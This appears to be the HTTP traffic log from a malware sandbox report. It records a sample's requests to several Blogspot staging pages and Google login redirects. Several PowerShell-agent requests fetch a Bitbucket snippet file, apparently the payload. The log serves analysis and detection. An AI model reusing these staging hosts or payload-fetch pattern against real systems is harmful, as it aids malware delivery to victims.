Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
